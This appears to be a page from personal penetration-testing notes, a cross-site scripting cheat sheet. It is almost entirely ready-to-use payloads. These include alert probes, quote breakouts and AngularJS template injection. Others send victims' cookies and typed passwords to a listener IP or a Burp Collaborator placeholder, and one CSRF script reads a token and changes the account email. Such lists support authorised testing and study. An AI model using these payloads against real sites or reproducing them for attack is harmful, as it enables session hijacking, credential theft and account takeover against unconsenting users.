Cross Site Scripting (XSS)

Examples:

<img src=1 onerror=alert(1)>
"><svg onload=alert(1)>
'"><img src=1 onerror=alert(1)>a'a\'b"c>%3f>%25%7d%7d%25%25>c<[[%3f$%7b%7b%25%7d%7dcake\
<iframe src="https://URL/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
bgz1k"onfocus="alert(1)"autofocus="o7t2y
javascript:alert(1)
'-alert(1)-' # breakout of ''
\"-alert(1)}// # Dom breakout
<><img src=1 onerror=alert(1)><img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>

Remotely steal cookies:

one-liner:

<img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>

script:

<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

Remotely steal passwords:

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

CSRF / XSS:

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

Angler.js < 1.6:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
{{1+1

Useful links:

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

What is cross-site scripting (XSS) and how to prevent it? | Web Security AcademyWebSecAcademy

Client-side template injection | Web Security AcademyWebSecAcademy

PreviousBrute forcing NextCracking

Last updated 3 years ago